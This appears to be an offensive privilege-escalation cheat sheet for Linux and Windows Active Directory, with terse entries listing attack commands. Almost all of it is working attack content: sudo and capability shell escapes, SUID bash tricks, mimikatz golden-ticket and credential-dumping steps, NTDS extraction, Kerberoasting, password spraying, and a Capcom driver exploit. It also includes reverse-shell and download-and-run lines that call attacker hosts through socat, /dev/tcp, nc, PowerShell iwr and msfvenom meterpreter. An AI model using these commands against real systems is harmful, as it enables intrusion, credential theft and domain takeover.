Abusing Sudo Binaries
Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Privileged Files
Methods:
- sudo vim -c ':!/bin/bash'
- sudo find /etc/passwd -exec /bin/bash \;
- echo "os.execute('/bin/bash')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
- sudo env /bin/bash
- sudo awk 'BEGIN {system("/bin/bash")}'
- sudo perl -e 'exec "/bin/bash";'
- sudo python -c 'import pty;pty.spawn("/bin/bash")'
- sudo less /etc/hosts, then !bash
- sudo man man, then !bash
- sudo ftp, then ! /bin/bash
- Attacker = socat file:`tty`,raw,echo=0 tcp-listen:1234
- Victim = sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
- echo test > notes.txt
- sudo zip test.zip notes.txt -T --unzip-command="sh -c /bin/bash"
- sudo gcc -wrapper /bin/bash,-s .
- sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
- sudo mysql -e '\! /bin/sh'
- sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
- sudo tmux
- sudo pkexec /bin/bash
- sudo rlwrap /bin/bash
- sudo xargs -a /dev/null sh
- sudo /home/anansi/bin/anansi_util manual /bin/bash
- sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"
- echo 'import pty; pty.spawn("/bin/bash")' > flask.py
- export FLASK_APP=flask.py
- sudo /usr/bin/flask run
- sudo apache2 -f /etc/shadow
- john hash --wordlist=/usr/share/wordlists/rockyou.txt
Abusing Scheduled Tasks
Domain: Y/N
Local Admin: Yes
OS: Linux
Type: Abusing Scheduled Tasks
Methods:
- echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
- chmod +x /home/user/systemupdate.sh
- Wait a while
- /bin/bash -p
- id && whoami
Golden Ticket With Scheduled Tasks
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abusing Scheduled Tasks
Methods:
1.mimikatz# token::elevate
2.mimikatz# vault::cred /patch
3.mimikatz# lsadump::lsa /patch
4.mimikatz# kerberos::golden /user:Administrator /rc4:<Administrator NTLM(step 3)> /domain:<DOMAIN> /sid:<USER SID> /sids:<Administrator SIDS> /ticket:<OUTPUT TICKET PATH>
5.powercat -l -v -p 443
6.schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://10.10.10.10/reverse.ps1)'"
7.schtasks /run /s DOMAIN /TN "enterprise"
Abusing Interpreter Capabilities
Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Capabilities
Methods:
- getcap -r / 2>/dev/null
- /usr/bin/python2.6 = cap_setuid+ep
- /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
- id && whoami
- getcap -r / 2>/dev/null
- /usr/bin/perl = cap_setuid+ep
- /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
- id && whoami
Abusing Binary Capabilities
Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Capabilities
Methods:
- getcap -r / 2>/dev/null
- /usr/bin/tar = cap_dac_read_search+ep
- /usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
- /usr/bin/tar -xvf key.tar
- openssl req -engine /tmp/priv.so
- /bin/bash -p
- id && whoami
Abusing ActiveSessions Capabilities
Domain: No
Local Admin: Yes
OS: Windows
Type: Abusing Capabilities
Methods:
. .\Heidi.ps1
Invoke-SQLOSCmd -Verbose -Command "net localgroup administrators user1 /add" -Instance COMPUTERNAME
Escalate with TRUSTWORTHY in SQL Server
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abusing Capabilities
Methods:
1. . .\PowerUpSQL.ps1
2. Get-SQLInstanceLocal -Verbose
3. (Get-SQLServerLinkCrawl -Verbose -Instance "10.10.10.10" -Query 'select * from master..sysservers').customquery
4.
USE "master";
SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF', 'IF');
execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN>\<DATABASE NAME>"
5. powershell -ep bypass
6. Import-Module .\powercat.ps1
7. powercat -l -v -p 443 -t 10000
8.
SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF', 'IF');
execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN>\<DATABASE NAME>"
execute('exec master..xp_cmdshell "\\10.10.10.10\reverse.exe"') at "<DOMAIN>\<DATABASE NAME>"
Abusing Mysql run as root
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abusing Services
Methods:
- ps aux | grep root
mysql -u root -p
\! chmod +s /bin/bash
exit
/bin/bash -p
id && whoami
Abusing journalctl
Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Services
Methods:
- journalctl
- !/bin/sh
Abusing VDS
Domain: No
Local Admin: Yes
OS: Windows
Type: Abusing Services
Methods:
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
Abusing Browser
Domain: No
Local Admin: Yes
OS: Windows
Type: Abusing Services
Methods:
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'
Abusing LDAP
Domain: Yes
Local Admin: Yes
OS: Linux
Type: Abusing Services
Methods:
0. exec ldapmodify -x -w PASSWORD
1. paste this
dn: cn=openssh-lpk,cn=schema,cn=config
objectClass: olcSchemaConfig
cn: openssh-lpk
olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME 'sshPublicKey'
DESC 'MANDATORY: OpenSSH Public key'
EQUALITY octetStringMatch
SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 )
olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME 'ldapPublicKey' SUP top AUXILIARY
DESC 'MANDATORY: OpenSSH LPK objectclass'
MAY ( sshPublicKey $ uid )
)
2. exec ldapmodify -x -w PASSWORD
3. paste this
dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC
changeType: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: content of id_rsa.pub
-
replace: EVIL GROUP ID
uidNumber: CURRENT USER ID
-
replace: EVIL USER ID
gidNumber: CURRENT GROUP ID
LLMNR Poisoning
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Abuse Service
Methods:
1.responder -I eth1 -v
2.create Book.url
[InternetShortcut]
IconIndex=0
IconFile=\\attacker_ip\not_found.ico
Abusing Certificate Services
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Abuse Service
Methods:
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
MySQL UDF Code Injection
Domain: Yes
Local Admin: Yes
OS: Linux
Type: Injection
Methods:
mysql -u root -p
mysql> use mysql;
mysql> create table admin(line blob);
mysql> insert into admin values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from admin into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('bash -i >& /dev/tcp/10.10.10.10/9999 0>&1');
Impersonation Token with ImpersonateLoggedOnUser
Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1.SharpImpersonation.exe user:<user> shellcode:<URL>
2.SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnUser
Impersonation Token with SeImpersonatePrivilege
Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1.execute-assembly sweetpotato.exe -p beacon.exe
Impersonation Token with SeLoadDriverPrivilege
Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1.EOPLOADDRIVER.exe System\\CurrentControlSet\\MyService C:\\Users\\Username\\Desktop\\Driver.sys
OpenVPN Credentials
Domain: No
Local Admin: Yes
OS: Linux
Type: Enumeration & Hunt
Methods:
locate *.ovpn
Bash History
Domain: No
Local Admin: Yes
OS: Linux
Type: Enumeration & Hunt
Methods:
- history
cat /home/<user>/.bash_history
cat ~/.bash_history | grep -i passw
Package Capture
Domain: No
Local Admin: Yes
OS: Linux
Type: Sniff
Methods:
locate:
- tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='
NFS Root Squashing
Domain: Yes
Local Admin: Yes
OS: Linux
Type: Remote Procedure Calls (RPC)
Methods:
- showmount -e <victim_ip>
mkdir /tmp/mount
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
cd /tmp/mount
cp /bin/bash .
chmod +s bash
Abusing Access Control List
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
- $user = "megacorp\jorden"
$folder = "C:\Users\administrator"
$acl = get-acl $folder
$aclpermissions = $user, "FullControl", "ContainerInherit, ObjectInherit", "None", "Allow"
$aclrule = new-object System.Security.AccessControl.FileSystemAccessRule $aclpermissions
$acl.AddAccessRule($aclrule)
set-acl -path $folder -AclObject $acl
get-acl $folder | folder
Escalate With SeBackupPrivilege
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
Escalate With SeImpersonatePrivilege
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
printspoofer.exe -i -c "powershell -c whoami"
Escalate With SeLoadDriverPrivilege
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
FIRST:
Download https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
Download https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp
Download https://github.com/tandasat/ExploitCapcom
change ExploitCapcom.cpp line 292
TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
to
TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");
then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe
SECOND:
1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe
2. .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
3. .\ExploitCapcom.exe
4. in msf exec `run`
Escalate With ForceChangePassword
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
Import-Module .\PowerView_dev.ps1
Set-DomainUserPassword -Identity user1 -verbose
Enter-PSSession -ComputerName COMPUTERNAME -Credential ""
Escalate With GenericWrite
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
$pass = ConvertTo-SecureString 'Password123#' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\MASTER USER', $pass)
Set-DomainObject -Credential $creds USER1 -Clear serviceprincipalname
Set-DomainObject -Credential $creds -Identity USER1 -Set @{serviceprincipalname='none/fluu'}
.\Rubeus.exe kerberoast /domain:<DOMAIN>
Abusing GPO
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1..\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\<USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION"
Pass-the-Ticket
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Abuse Ticket
Methods:
1..\Rubeus.exe asktgt /user:<USER>$ /rc4:<NTLM HASH> /ptt
2.klist
Golden Ticket
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Abuse Ticket
Methods:
1.mimikatz # lsadump::dcsync /user:<USER>
2.mimikatz # kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<OBJECT SECURITY ID> /rc4:<NTLM HASH> /id:<USER ID>
Abusing Splunk Universal Forwarder
Domain: No
Local Admin: Yes
OS: Linux/Windows
Type: Abuse Channel
Methods:
python PySplunkWhisperer2_remote.py --lhost 10.10.10.5 --host 10.10.15.20 --username admin --password admin --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11"'
Abusing Gdbus
Domain: No
Local Admin: Yes
OS: Linux/Windows
Type: Abuse Channel
Methods:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true
Abusing Trusted DC
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Abuse Channel
Methods:
- Find user in First DC
- If port 6666 enabled
- proxychains evil-winrm -u user -p 'pass' -i 10.100.9.253 -P 6666
- .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"
- proxychains evil-winrm -u Administrator -p 'pass dumped in step 4' -i 10.100.10.100 -P 6666
NTLM Relay
Domain: Yes
Local Admin: Y/N
OS: Windows
Methods:
responder -I eth1 -v
ntlmrelayx.py …
Exchange Relay
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: NTLM
Methods:
./exchangeRelayx.py …
Dumping with diskshadow
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Dumping
Methods:
1. priv.txt contain
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias 0xprashantp
createp
expose %0xprashant% z:p
2. exec with diskshadow /s priv.txt
Dumping with vssadmin
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Dumping
Methods:
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
Password Spraying
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Spraying
Methods:
./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
AS-REP Roasting
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Kerberos
Methods:
.\Rubeus.exe asreproast
Kerberoasting
Domain: Yes
Local Admin: Y/N
OS: Windows
Type: Kerberos
Methods:
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt